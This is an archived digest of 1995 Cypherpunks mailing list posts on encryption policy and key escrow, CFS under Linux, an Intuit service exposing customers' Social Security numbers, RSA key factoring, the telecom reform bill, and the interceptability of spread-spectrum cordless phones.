From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Dec 95 10:17:55 PST
To: cypherpunks@toad.com
Subject: Re: The War on Some Money [long]
Message-ID: <acfee17a030210040934@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Amidst all the flames about impure Cypherpunks on the list, about evil
capitalist corporations, about conspiracies involving the underground Grey
Alien bases in Nevada, and amidst the flames about posts not dealing solely
with number theory or ciphers, it's nice to read a post like this one from
David Murray.

The tension between "private transactions" and "traceable transactions" is
indeed at the core of the debate.

Kudos to David on this. I just want to end on a positive note before
leaving for the holidays (the birthday of my savior, F. Hayek, of course).

--Tim May




Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 21 Dec 95 11:36:41 PST
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
Message-ID: <2.2b7.32.19951221193732.008cb5b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 12/20/95 -0500, Matt Blaze wrote:

>I'm told that all version of CFS since 1.0.4 (the latest is 1.3.1)
>do work out-of-the-box under *some* releases of Linux and with some
>coaxing on the others.

I am wondering if he is compiling for ELF.  That seems to throw a good size
monkey wrench into just about every piece of software out there.  (At least
the ones that have not been written to take the ELF paculiarities into account.)

>I'm not sure exactly what problem you're having, but the most common
>CFS-Linux problem that people complain about has to do with the rpcgen
>output not being in the format expected by the rest of CFS.  There
>seem to be two things you can do about this:  get a version of rpcgen
>that generates the "standard" (original Sun) names for the functions it
>generates, or just grab the rpcgen output from the cfs-users mailing list
>archive ("echo help | mail cfs-users-request@research att.com" for details).

I think you may be right on this one.  I have heard of a few other things
having problems with Linux's version of rpcgen.  (The names of which are not
coming to mind...  Need more coffee.)

[rest of reply deleted because I had nothing to say about it]

ObNoise:
>NB to "Bill Gates" and friends:  To save you the trouble of pointing it out,
>I hereby admit that I'm a commie-fascist brainwashed sold out member of the
>military-industrial complex who has been programmed by his masters to
>infiltrate the cypherpunks in order to sap and impurify their precious
>bodily fluids.

I think that the mention of Mr. Bill as a "good guy" is the most effective
use of agent provoceteur-type behaviour I have seen on this list yet.

We know who Mat and Jeff work for.  Who do the anon-flamers work for?

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Dec 95 08:39:40 PST
To: cypherpunks@toad.com
Subject: KGB_cia
Message-ID: <199512211639.LAA04102@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-21-95. WPutz:

   "In an unusual interview Yevgeny Primakov, head of the
   Russian Foreign Intelligence Service, discussed problems
   and challenges facing his intelligence agency in terms that
   often sounded like testimony that CIA Director John M.
   Deutch gave the House intelligence committee Tuesday.

   In comments that echoed those of his U.S. counterparts,
   Primakov charged that some post-Cold War budget cuts in his
   agency developed 'because the [Russian] press ganged up on
   us [and] many newspapers wrote absurd things about us,
   including statements that foreign intelligence was no
   longer necessary at all.' His remarks about media coverage
   were similar to recent statements by Deutch and his
   predecessors, R. James Woolsey and Robert M. Gates."


   KGB_cia  (5 cia)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 21 Dec 95 08:54:31 PST
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program
Message-ID: <Pine.BSD.3.91.951221115215.9337B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
On 12 17 95 jimbell@pacifier.com proposed 
 
    ...a system...that would "blind" campaign donations as to 
    their source:  The donor could be satisfied that his dona- 
    tion gets to the candidate or cause, but the candidate could- 
    n't know  who actually paid the money (and the donor would 
    be unable to prove that he made a donation...). 
 
 
Let's analyse: 
 
A gives B what B wants (money) so that B will give A what A 
  wants (whatever). 
A knows B got the money. 
A can't prove he gave the money to B. 
 
B knows he got the money. 
B can't be sure that A gave the money. 
 
So, depending on time, place, and circumstance; and assum- 
ing B's elected: 
 
     B will not give A what A wants
 
                 OR 
 
     B will give A what A wants 
 
 
For instance, if... 
 
 
  A gives the money but dies before B gets elected. 
 
  A gives the money but gets sent to the Balkans. 
 
  A is a nobody. 
 
 
...B will not give A what A wants. 
 
 
For instance, if... 
 
 
  A gives the money but B's already in debt to him, and the 
    baloon payment's due. 
 
  A gives the money and A's appointed head of an office where 
    B's relatives "work." 
 
  A is the main man in town. 
 
 
...B will give A what A wants. 
 
 
Some things are known by some people whether they're entered 
on the books or not. 
 
I agree with the proposer that his system 
 
    ...would change politics as we know it.
 
 
Flexible corruption is best. 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 21 Dec 95 12:01:29 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512211958.LAA27482@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Plotnikoff, in his regular (WWW oriented) column in the San Jose
Mercury News, writes:

DOES YOUR BOSS KNOW WHERE YOU'RE SURFING?

The SIMBA Media daily reported recently that a Maryland-based software
publisher called Charles River Media has introrduced a $30 electronic fink
program called "Internet Watchdog" that keeps an eye on where you've been
hanging out on the Net.  the program doesn't block or censor sites, but it
does maintain a handy record of cyber-footprints that the parent, teacher
or employer who controls your Net access can peruse.

----[end]----

Anyone know more about this program?


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Dec 95 09:05:23 PST
To: cypherpunks@toad.com
Subject: just a reminder...
Message-ID: <199512211705.MAA01270@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This isn't anti-trust punks...

...or microsoft punks...

...its cypherpunks...

...Just a reminder.

.pm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Dec 95 11:26:44 PST
To: cypherpunks@toad.com
Subject: Re: Cypherpunks resumes?
Message-ID: <acfef043040210048277@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:55 AM 12/21/95, Anonymous wrote:
>Is there any chance of seeing a Cypherpunks 'Rogues Gallery' of sorts
>in the archives anytime soon?  It would be nice to see a face connected
>to the postings here.  Some of us don't get the chance of getting out
>west for the parties, The only other thing I know about Tim May besides
>being one of the Fathers of the Cypherpunks is that he was a naked hippie
>in a hot tub at some party that Robert Hettinga was at some weeks ago,
>
>That doesn't paint a good picture for me.
-


But, "Anonymous," we don't even know which of the many "Anonymous" ones you
are, so why should we go out of our way to provide images, resumes,
dossiers, etc., to you?

In any case, many of the folks on this list have elected to have Web pages,
often with images of themselves, their SOs, their pets, their computers,
and so on. Perhaps their images will paint a better picture for you. (I
note that the last "Anonymous" person concerned with getting the "real"
pictures of people was S. Boxx, or maybe Pablo Escobar, I forget.)

(I have not spent time generating a "home page." I see the burgeoning
shelves of "HTML Bible" self-help books and see more and more people
spending time gussying-up their home pages. People are even putting their
personal diaries on the Web, plus all sorts of personal stuff that is
finding its way into compiled dossiers. Not for me. I prefer my essays to
be what goes into my dossiers.)

Or, as our esteemed Gothamite might reJoyce:

Erudite, profligate, disputacious -- indistinguishable from many other
publicity-saving levitationisms. 'Tis superficially an expurgated part of
the Ruby Ridge-slippered Great Oz divulgation. Ostentatiously, the
preterite few surf the gilt-edged waves while Jose Sixpacks languish in
spider-webbed Quayle-spelt ghettoes populated by home page homeys.

For further emendations and emissions, behave normally and reply with a
blank message labelled:

XMAS_troll


--You Know Who






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 21 Dec 95 14:09:52 PST
To: Jyri Kaljundi <jk@jaramillo.digit.ee>
Subject: Re: FTC Privacy Initiative (fwd)
In-Reply-To: <Pine.SOL.3.91.951220212612.8508E-100000@jaramillo.digit.ee>
Message-ID: <Pine.SOL.3.91.951221140651.3315B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain




FWIW, Sunsite has always had a policy of following the guidelines of the 
American Library Association on both collections policy and use of access 
records. The ALA rules are pretty cool, and have the great advantage of 
being easily understood by administrators (it also means that you can 
rely on the library community as an ally in the event of challenges.)

Joe-Bob says check them out

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Thu, 21 Dec 95 12:25:30 PST
To: cypherpunks@toad.com
Subject: Re: 900mhz digital phones - how much to trust ?
Message-ID: <199512212046.OAA18997@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


>
>Whats the current thinking on the security level of 900Mhz digital spread
>sectrum cordless phones? Clearly it's not a basic scanner job but how much
>more equipment is needed to monitor one ?

Well when you listen into a spread spectrum conversation what you will hear
is open squelch white noise.  The spread spectrum radios that I know about
send information on several deffrent frequencies throughout the
conversation.  Unless you have a system to receive the encoding bit that
signal what frequency is next you can't easily find the next freqency before
it changes again.  This change happens several time a second.  The
information is "packet-like", that is why you are able to use so many spread
spectrum units at once.  Example, Lynx spread spectrum T1 information signal
(data) is combined with a high rate spreading code (chip sequence). A
multiplier performs the combination.  Because the spreading code is
pseudo-randomly generated, the combined signal occupies a significantly
expanded bandwidth with a lower uniform power density.  At the receiver, a
locally generated, synchronized replica of the spreading code recovers the
information signal, through a second multiplication.  The same code sequence
must be used in the transmitter and receiver to avoic losing the information. 

The coding is direct sequence, 16 x spreading rate, the number of codes is a
9 DIP switch selectable.

Intresting is taht the radio acquisition time is 500 msec, typical.  If this
a security hole I don't know.

Note this is typical of a Spread Spectrum Microwave radio, a lot of the same
applies to 900MHz T1 and cordless phones.  As soon as I have further info on
encryption of signal/Freq. destination I'll post it.

                Dr0id


( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Thu, 21 Dec 95 12:25:51 PST
To: cypherpunks@toad.com
Subject: Re: ex encrypted script
Message-ID: <199512212047.OAA19022@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


]
>
>| Is there a way to encrypt a script yet still allow it to be runnable?  I
>| know that the simple answer is to write it in C and compile it but I don't
>| have the means of doing that at the moment.  (i.e. there is not compiler on
>| the system)
>| 
>| I thought of a few simple protections but they all involve decrypting before
>| running.
>
>	Ever hear of chmod?  chown?
>Adam

The vendor also has superuser access..  chmod chown won't protect it.. :(


( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 21 Dec 95 15:11:04 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <acfe321c01021004d5c5@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951221145251.3728B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net wrote:

> Not in cracking "truly large" problems by brute force. Even if each of the
> million processors is capable of 100 MIPS (which is unlikely, given the PIM
> approach and the fine-granularity, few-bit-or-less word size, etc.), this
> is only 10^8 MIPS. For problems that (for instance) 10^75 machines would
> have to spend 10^10 years on, not even a drop in an ocean.

The problem is there are still people and organizations that use 512-bit 
RSA keys.  The DOE recentedly awarded Intel a contract to build a 
computer with 9072 Pentium Pro processors.  I doubt that it will be used 
for factoring keys, but if it were, it will be able to factor a 512-bit 
number in a matter of months.

The boundary delimiting "truly large" problems and merely extremely 
expensive ones inches up all the time.  Less than a decade ago people 
thought factoring RSA-129 was a "truly large" problem.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Thu, 21 Dec 95 13:43:08 PST
To: David Mandl <dmandl@bear.com>
Subject: Re: KOD
In-Reply-To: <Pine.SUN.3.91.951220160232.4338q-100000@goya>
Message-ID: <Pine.SOL.3.91.951221163817.26896A-100000@echonyc.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh come on, be a sport.  

On Wed, 20 Dec 1995, David Mandl wrote:

> On Wed, 20 Dec 1995, John Young wrote:
> 
> > Congratulations to the cypherpunks named Newsweek's "Big 
> > Thinkers of tomorrow -- the list of 50 People Who Matter Most 
> > on the Internet." In the December 25 issue.
> 
> Can you reveal who they are?  No way am I going to buy Newsweek to
> find out.
> 
>    --Dave.
> 
> --
> David Mandl
> Bear, Stearns & Co. Inc.
> Phone: (212) 272-3888
> Email: dmandl@bear.com
> 
> --
> *******************************************************************************
> Bear Stearns is not responsible for any recommendation, solicitation, offer or
> agreement or any information about any transaction, customer account or account
> activity contained in this communication.
> *******************************************************************************
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@mae.engr.ucdavis.edu>
Date: Thu, 21 Dec 95 16:52:17 PST
To: ECafe Anonymous Remailer <cpunk@remail.ecafe.org>
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org>
Message-ID: <Pine.HPP.3.91.951221165411.6535B-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 21 Dec 1995, ECafe Anonymous Remailer wrote:

> ATT and Netscape are both tools of the CIA/NSA.
> Blaze and Weinstein are in on the
> plot to force GAK upon us.  Neither one
> says enough about the evils of GAK on their
> web page, so they're obviously for GAK and
> only pretending to be against it to fool
> the cypherpunks and curry favor with their NSA
> masters.

Hmm.  You don't happen to be a conspiracy theorist,
do you?

Tobin Fricke





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 21 Dec 95 17:21:39 PST
To: paul.elliott@hrnowl.lonestar.org (Paul Elliott)
Subject: Re: GAK boycott, What are legal implications?
In-Reply-To: <30d9ca78.flight@flight.hrnowl.lonestar.org>
Message-ID: <199512220119.RAA23373@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


> Here is a question for all of you cyber legal types out there.
> This question presupposes:
> 
> The NIST will complete its work on the GAK standard. But no law will be
> passed (yet) regulating the use of encryption in the U. S. (The GAK standard
> is an attempt to create an environment in which such laws can be passed.)
> In the U.S., Big Company INC will start marketing a GAKed encryption
> product domesticly.
> 
> A bunch of cypherpunkish types will immediately try to organize a boycott
> against BIG COMPANY.

I think it's more likely that a group of people will work on
breaking Big Co's GAKed product.  Either finding a flaw
in it's algorithm or protocol that can be exploited, or
a flaw that renders it's GAK unusable, i.e. Matt Blaze's
LEAF hack on Clipper.

> What are the cypherpunks legal risks?
> 
> I seem to remember that back in the 70s, the NAACP lost a big case
>with respect to their boycott in a southern city. As I recall there were people
> in the street begging money for the NAACP because there was a > 10**6 $
> judgement against the NAACP and they needed that much just to appeal.

Well, NAACP is an actual organization with papers filed
with the IRS, officers or some sort of board members, offices, etc.

Cypherpunks is just a mailing list, and many of the members
of the list don't use their real identies on the list.

Who would they go after?


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@mae.engr.ucdavis.edu>
Date: Thu, 21 Dec 95 17:50:02 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: Microsoft Flame[tm] [NOISE]
In-Reply-To: <m0tSpkY-0008ynC@pacifier.com>
Message-ID: <Pine.HPP.3.91.951221174959.6685C-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 21 Dec 1995, jim bell wrote:

> Well, I disagree.  Microsoft succeeded  primarily because it was "chosen" by
> IBM in about 1981 or so, needing an OS for their PC.  MS didn't even write
> it; Seattle Computer did, and that was a port of CP/M.  Not much creativity.
> MSDOS revisions 1.0 and 1.1 were pure crap.

I'm sure that's true to a large extent.  However, although I may be 
wrong, I beleive that MS's primary reason for initial success was in MS 
BASIC.  They needed a new OS to go with BASIC, so they used DOS.  They 
needed a new filesystem to store BASIC files, and thus FAT was born.

Tobin Fricke
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 21 Dec 95 09:06:58 PST
To: cypherpunks@toad.com
Subject: FWD: Intuit and SSNs
Message-ID: <199512211706.SAA10738@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


What does our man in Intuit have to say about this? 

>  Date: 18 Dec 1995 19:10:07 -0800
>  From: michael@piglet.amscons.com (Michael Bryan)
>  Subject: SSN Shown On Payments by Intuit's Banking Service
>  Organization: none
>  
>  Another user (Robert Mayo) discovered, and I confirmed, that Intuit's
>  online bill payment service sends your payees a printout containing
>  your social security number.
>  
>  This applies to any person who is using Quicken for Windows or
>  Microsoft Money for Windows to send payment requests electronically,
>  using Intuit's service.  It specifically does -not- apply to using
>  Quicken with the Checkfree service, as the Checkfree service does not
>  supply anybody with your SSN.
>  
>  The details:
>  
>  When the Intuit service sends a payment to a merchant, it will do one
>  of three things.  First, it will try to perform an EFT directly from
>  your account into the merchant's.  Most merchant's are still not setup
>  for this, however.  Second, if your payment is the only payment going
>  to a given merchant on a given day, then they will print a check, drawn
>  against your account, and mail it to the merchant.  Both of these
>  methods are ok, and do not result in your merchant receiving your SSN.
>  
>  However, if there are multiple payments going to a single merchant on a
>  given day (i.e., more than one customer has requested a payment to the
>  given merchang), all of these payments are sent in a single envelope,
>  and a summary sheet is enclosed.  This summary sheet will have a field
>  called "Control Number", which consists of your SSN, followed by two
>  other digits.  This summary also lists your checking account number, in
>  addition to your name, account with the merchant, and the amount of
>  your payment.  (In my opinion, only these last three fields are called
>  for.  There is no need for the checking account number to be listed,
>  even though it -is- printed on your check as part of the MICR
>  encoding.)
>  
>  I have contacted Intuit regarding this matter, and they have been
>  decidedly less than helpful.  I know at least three other people who
>  have called them, and we have all been told the same thing:
>  
>  1) "Most of your merchants already have your SSN".  Perhaps this is
>  true for some people, but it is not the case with me.
>  
>  2) "The SSN is encrypted on the printout".  Absolutely not true.  It is
>  printed under the label "Control Number", and has two extra digits
>  appended, but this does not "encrypt" the number.  Anybody who knows
>  what the field contains has instant knowledge of your SSN.
>  
>  Intuit is currently refusing to address this issue.  Furthormore, when
>  I called in, they tried to tell me I was the only person who was
>  complaining.  I immediately gave them the names of three other people
>  who had called in, one of whom I knew had talked to this particular
>  individual.  So that little "divide-and-conquer" trick backfired.
>  
>  Also, when I said that I would be forced to go to the media if they
>  didn't address this issue, I was told that by doing so, I would be
>  responsible for broadcasting this information to those who might then
>  illegally use the information.  I found this two-faced attitude
>  particularly annoying.  On the one hand, they are claiming it's not a
>  problem, yet on the other they tried to keep me from going to the media
>  because it might give criminals information they could then exploit.
>  
>  Anyway, I've done all I can with talking to Intuit, so I am now
>  pursuing other avenues.  My bank (Union Bank) was particularly
>  concerned that the SSN was being printed out and mailed with
>  potentially every payment, and vowed to look into it and work with
>  Intuit on my behalf to get this behaviour stopped.  Also, I and a few
>  others have contacted various media representatives, in an attempt to
>  get them to focus a spotlight on Intuit, and let people know that
>  Intuit is broadcasting their SSN, without their knowledge.  And of
>  course, I'm posting Usenet articles in the privacy newsgroups, as well
>  as the newsgroup where most Quicken discussion occurs,
>  comp.os.ms-windows.apps.financial.
>  
>  If you are using Intuit's Online Bill Payment service, and are
>  concerned about this, please call Intuit and express your displeasure.
>  The number for the Online Bill Payment service is 708-585-8500.  Also,
>  call your bank, and inform them as to what's going on.  Finally, write
>  to your local (or national) newspaper, let them know about this, and
>  ask them to cover this in their paper.
>  
>  It appears that the only way Intuit is going to address this is by
>  getting some negative publicity, since customer complaints don't seem
>  to carry enough weight.  I wish they were more reasonable, but that
>  just doesn't seem to be happening here.  So be it --- they want a
>  fight, they've got one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 21 Dec 95 15:07:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Encryption Rules Coming
In-Reply-To: <199512211605.LAA00150@pipe3.nyc.pipeline.com>
Message-ID: <199512212307.SAA14030@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


>    Financial Times, December 21, 1995, p. 4.
> 
>    Encryption rules to be prepared
> 
>    By Andrew Jack in Paris
> 
>    Representatives of international business and government
>    yesterday agreed to draw up guidelines on encryption, 
[...]
>    The meeting, which was held at the International Chamber of
>    Commerce in Paris, could lead to formal propositions
>    prepared jointly by business and government organisations
>    that could be ready by as soon as next summer.
[...]
>    However, many governments
[...]
>    have demanded that they should be able to "hack" into
>    computer transmissions for counter-intelligence and
>    criminal investigation work, in the same way that they can
>    conduct telephone-tapping exercises.
> 
>    An important conclusion of yesterday's Paris meeting was
>    that business agreed in principle to allow such hacking to
>    take place as long as sufficient safeguards were in place
>    and "electronic search warrants" had been issued with
>    proper judicial approval.
[...]

The Int'l. Chamber of Commerce turns out to have Web pages. Their latest
press release on the web came out last week, describing the upcoming
conference: <a href="http://spider.usa1.com/~ibnet/iccpr883.html">Business
and governments seek agreed policy on encryption of electronic messages</a>

A few excerpts:

"OECD governments are participating in the two day conference, together with 
representatives of the International Chamber of Commerce (ICC), the Business 
and Industry Advisory Committee to the OECD (BIAC), and information 
technology associations covering Europe, Canada, Japan, and the United States."

"An ICC expert, Stefan Bernhard, said: `Just as government agencies are 
obliged to seek court warrants before making physical searches within a 
company, or in the home of a private person, the same restrictions should 
apply on the information superhighway.'"

"For further information contact Lionel Walsh at the ICC communications 
division (33 1) 49 53 28 23. Email - ICCOM@ibnet.com"

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 21 Dec 95 15:14:28 PST
To: cypherpunks@toad.com
Subject: Telcom bill report
Message-ID: <01HZ2U34JNWW8Y53CL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Here's the additional info from Reuters. As usual, Clinton is being a
coward. For additional Cypherpunks relevance, anonymous remailer operators in
the US may need to watch out.
	-Allen

   Reuters New Media
   
   _ Thursday December 21 2:11 PM EST _
   
Congress Reaches Compromise On Telecom Reform

   WASHINGTON - Congressional conferees have agreed to a sweeping reform
   of telecommunications law that would open competition by allowing the
   telephone, cable and broadcast industries to invade the others' turf.
   
   Vice President Gore says President Clinton will sign the bill. Before
   the agreement, the president had been threatening for months to veto
   the bill if Republicans in Congress did not retreat on a long list of
   issues. They retreated.
   
   Vice President Al Gore said "This will unleash a new era in the
   telecommunications revolution and speed completion of the information
   highway."
   
   The bill would also impose tough new restrictions on sexual material
   on online services. It has been bitterly opposed by civil rights
   groups who say the controls on sexual content constitute censorship.
   
   The legislation would impose fines of up to $100,000 and prison terms
   of up to two years on people who make "indecent" material
   available to minors over computer networks. That could pose big
   problems for companies that provide online information services.
   
   The "cyberporn" issue was championed by conservative
   religious groups, including the Christian Coalition, and is certain to
   provoke a new courtroom battle over Constitutional rights to free
   speech.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Dec 95 15:32:53 PST
To: cypherpunks@toad.com
Subject: Telcom bill report
Message-ID: <199512212332.SAA13156@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by EALLENSMITH@ocelot.Rutgers.EDU ("E. ALLEN 
SMITH") on Thu, 21 Dec  6:12 PM

   
>   The "cyberporn" issue was championed by conservative
>   religious groups, including the Christian Coalition, and is 
certain to
>   provoke a new courtroom battle over Constitutional rights 
to free
>   speech.


In the NYT the sentence above was followed by:


"Indeed, the measure includes a provision that requires a 
Federal court in Washington to take up the issue almost as soon 
as someone challenges its legality."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: floyddb@alpha.c2.org
Date: Thu, 21 Dec 95 19:07:52 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512220241.SAA14531@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


andr0id@midwest.net (Jason Rentz) wrote:

>>
>>Whats the current thinking on the security level of 900Mhz digital spread
>>sectrum cordless phones? Clearly it's not a basic scanner job but how much
>>more equipment is needed to monitor one ?
>
>Well when you listen into a spread spectrum conversation what you will hear
>is open squelch white noise.  The spread spectrum radios that I know about
>send information on several deffrent frequencies throughout the
>conversation.  

        [snip]

>                Dr0id
>
>
>( Computer Consulting & Management   )
>(P.O. Box 421  Cambria, IL 62915-0421)
>

        [snip]
        There is a company called Optoelectronics that markets a radio reciever 
         called the Interceptor.  This is a broad band (several hundred MHz) 
         device designed to lock on to the most powerful signal around,
         regardless of frequency.  As supplied, it only has a rubber duck 
         antenna, but a broadband, directional antenna (Log Periodic?) could be 
         attached.  There are AM and FM versions that output audio and a version
         called the Scout that controls a scanner.  These could have outboard 
         devices hung on to them to decode digital signals, record the 
         conversation ... all for less than $1000.

        

        Floyd D. Barber
        floyddb@alpha.c2.org
        Key fingerprint:
        8A 98 1F 6B 70 7A FE 24 
